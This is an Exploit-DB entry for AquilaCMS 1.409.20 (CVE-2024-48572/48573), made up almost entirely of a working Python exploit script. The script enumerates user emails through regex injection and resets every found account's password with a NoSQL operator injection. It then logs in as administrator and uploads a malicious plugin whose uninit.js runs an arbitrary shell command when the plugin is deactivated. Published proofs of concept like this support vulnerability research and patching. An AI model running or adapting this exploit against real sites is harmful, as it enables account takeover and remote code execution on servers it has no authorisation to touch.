AquilaCMS 1.409.20 - Remote Command Execution (RCE)

EDB-ID:

52164




Platform:

PHP

Date:

2025-04-10


# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE)
# Date: 2024-10-25
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.aquila-cms.com/
# Software Link: https://github.com/AquilaCMS/AquilaCMS
# Version: v1.409.20
# CVE: CVE-2024-48572, CVE-2024-48573


import io
import json
import uuid
import string
import zipfile
import argparse
import requests
import textwrap


def unescape_special_characters(email):
    """Return *email* with bracket-escaped regex metacharacters made literal.

    Each escaped token (for example ``[.]`` or ``[\\^]``) is replaced by the
    single character it stands for. The replacements are applied one after
    another in the order listed below; text that contains none of the
    tokens is returned unchanged.
    """
    escaped_to_literal = (
        ("[$]", "$"),
        ("[*]", "*"),
        ("[+]", "+"),
        ("[-]", "-"),
        ("[.]", "."),
        ("[?]", "?"),
        (r"[\^]", "^"),
        ("[|]", "|"),
    )

    readable = email
    for token, literal in escaped_to_literal:
        readable = readable.replace(token, literal)
    return readable


def get_user_emails():
    """Enumerate registered email addresses one token at a time.

    Starting from the anchor ``^``, every known prefix is extended with each
    candidate token and sent as ``{"email": "<prefix><token>.*"}`` in a PUT
    to ``{args.url}/api/v2/user``. A response whose JSON ``code`` equals
    ``"UserAlreadyExist"`` keeps the extended prefix for the next round. A
    prefix that no token can extend is recorded as a complete address and
    printed in unescaped form.

    Reads the module-level ``args.url``. Issues one HTTP request per
    (prefix, token) pair.

    Returns:
        list[str]: the addresses found, without the leading ``^`` and still
        in bracket-escaped form (see ``unescape_special_characters``).
    """
    alphabet = [*string.ascii_lowercase, *string.digits, *"!#%&'/=@_`{}~"]
    # Regex metacharacters are probed in bracket-escaped form.
    alphabet += ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]

    emails_found = []
    frontier = ["^"]

    while frontier:
        current_round, frontier = frontier, []

        for prefix in current_round:
            extended = False

            for token in alphabet:
                candidate = prefix + token
                res = requests.put(
                    f"{args.url}/api/v2/user", json={"email": f"{candidate}.*"}
                )

                if json.loads(res.text)["code"] != "UserAlreadyExist":
                    continue
                frontier.append(candidate)
                extended = True

            if extended:
                continue

            # Nothing extends this prefix: treat it as a full address.
            address = prefix[1:]
            emails_found.append(address)
            print(f"[+] {unescape_special_characters(address)}")

    return emails_found


def reset_password(email):
    """Run the two-step password reset flow for *email*.

    Two POSTs are sent to ``{args.url}/api/v2/user/resetpassword``: the
    first carries the email address, the second carries ``args.password``
    together with a ``{"$ne": None}`` object in the ``token`` field. Neither
    response is inspected, so the line printed at the end reports the
    attempted credentials rather than confirmed success.

    Args:
        email: address in the bracket-escaped form produced by
            ``get_user_emails``.
    """
    endpoint = f"{args.url}/api/v2/user/resetpassword"

    # Step 1: request a reset for the address.
    requests.post(endpoint, json={"email": email})

    # Step 2: submit the new password with an operator object as the token.
    confirmation = {"token": {"$ne": None}, "password": args.password}
    requests.post(endpoint, json=confirmation)

    print(f"[+] {unescape_special_characters(email)} : {args.password}")


def get_admin_auth_token(emails):
    """Return the admin login token for the first address that is accepted.

    Each address is tried in order against
    ``{args.url}/api/v2/auth/login/admin`` with ``args.password``. The first
    HTTP 200 response ends the search.

    Args:
        emails: iterable of addresses to try as the ``username`` field.

    Returns:
        The ``data`` member of the successful login response, or ``None``
        when no address is accepted (including when *emails* is empty).
    """
    for candidate in emails:
        credentials = {"username": candidate, "password": args.password}
        res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=credentials)

        if res.status_code != 200:
            continue

        print(f"[+] Administrator account : {unescape_special_characters(candidate)}")
        return json.loads(res.text)["data"]

    return None


def create_plugin(plugin_name):
    """Build an in-memory plugin archive named *plugin_name*.

    The archive holds three members under a ``<plugin_name>/`` folder, in
    this order: ``package.json``, ``info.json`` and ``uninit.js``. The
    ``uninit.js`` script passes the module-level ``args.command`` to Node's
    ``child_process.exec``; the command text is interpolated verbatim.

    Args:
        plugin_name: used for the folder name and the ``name`` field of
            ``package.json``.

    Returns:
        io.BytesIO: the zip data, rewound to position 0.
    """
    uninit_script = textwrap.dedent(
        f"""
    const {{ exec }} = require("child_process");

    /**
     * This function is called when the plugin is desactivated or when we delete it
     */
    module.exports = async function (resolve, reject) {{
      try {{
        exec("{args.command}");
        return resolve();
      }} catch (error) {{}}
    }};
    """
    ).strip()

    # (member name, content) pairs, written in this order.
    members = (
        ("package.json", f'{{ "name": "{plugin_name}" }}'.encode()),
        ("info.json", b'{ "info": {} }'),
        ("uninit.js", uninit_script.encode()),
    )

    archive = io.BytesIO()
    with zipfile.ZipFile(
        archive, mode="a", compression=zipfile.ZIP_DEFLATED, allowZip64=False
    ) as bundle:
        for member_name, content in members:
            bundle.writestr(f"{plugin_name}/{member_name}", content)

    archive.seek(0)
    return archive


def rce(emails):
    """Upload a plugin as administrator and toggle it off.

    Steps, each announced on stdout:

    1. Obtain an admin token via ``get_admin_auth_token(emails)``; stop if
       none is returned.
    2. Build a plugin archive with a random hex name (``create_plugin``).
    3. POST the archive to ``/api/v2/modules/upload``.
    4. List modules via ``/api/v2/modules`` and look up the entry whose
       ``name`` equals the plugin name; stop if it is absent.
    5. POST ``{"idModule": <id>, "active": False}`` to
       ``/api/v2/modules/toggle``. HTTP 200 is reported as success; any
       other status as failure.

    Args:
        emails: candidate addresses handed to ``get_admin_auth_token``.
    """
    auth_token = get_admin_auth_token(emails)
    if auth_token is None:
        print("[-] Administrator account not found")
        return

    # Every authenticated request below carries the same header.
    auth_headers = {"Authorization": auth_token}

    print("[+] Create malicious plugin")
    plugin_name = uuid.uuid4().hex
    archive = create_plugin(plugin_name)

    print("[+] Upload plugin")
    upload = {"file": (f"{plugin_name}.zip", archive, "application/zip")}
    requests.post(
        f"{args.url}/api/v2/modules/upload", headers=auth_headers, files=upload
    )

    print("[+] Find uploaded plugin")
    listing = requests.post(
        f"{args.url}/api/v2/modules",
        headers=auth_headers,
        json={"PostBody": {"limit": 0}},
    )

    plugin_id = None
    for module in json.loads(listing.text)["datas"]:
        if module["name"] != plugin_name:
            continue
        plugin_id = module["_id"]
        print(f"[+] Plugin ID : {plugin_id}")
        break

    if plugin_id is None:
        print("[-] Plugin not found")
        return

    print("[+] Deactivate plugin")
    toggle = requests.post(
        f"{args.url}/api/v2/modules/toggle",
        headers=auth_headers,
        json={"idModule": plugin_id, "active": False},
    )

    print(
        "[+] Command execution succeeded"
        if toggle.status_code == 200
        else "[-] Command execution failed"
    )


def main():
    """Run the three phases in order: enumerate, reset, execute.

    NOTE: the reset phase calls ``reset_password`` for *every* address the
    enumeration phase returns, not only for an administrator account.
    """
    # Phase 1: collect addresses.
    print("[*] Retrieve email addresses")
    emails = get_user_emails()

    # Phase 2: reset the password of each collected address.
    print("\n[*] Reset password")
    for address in emails:
        reset_password(address)

    # Phase 3: admin login, plugin upload and toggle.
    print("\n[*] Perform remote code execution")
    rce(emails)


if __name__ == "__main__":
    # Command-line entry point. The parsed namespace is stored in the
    # module-level name ``args``, which the functions above read directly
    # (args.url, args.password, args.command).
    parser = argparse.ArgumentParser(
        description=(
            "Proof of concept for CVE-2024-48572 / CVE-2024-48573 in "
            "AquilaCMS 1.409.20. Resets the password of every enumerated "
            "account; run only against systems you are authorized to test."
        )
    )
    parser.add_argument(
        "-u",
        dest="url",
        # The value is interpolated straight into request URLs, so it must
        # carry a scheme; a bare host name makes requests raise
        # MissingSchema. The example points at a local lab instance.
        help="Site base URL including scheme (e.g. http://localhost:3010)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-p",
        dest="password",
        help="Password to use for password reset (e.g. HaXX0r3d!)",
        type=str,
        default="HaXX0r3d!",
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()

    main()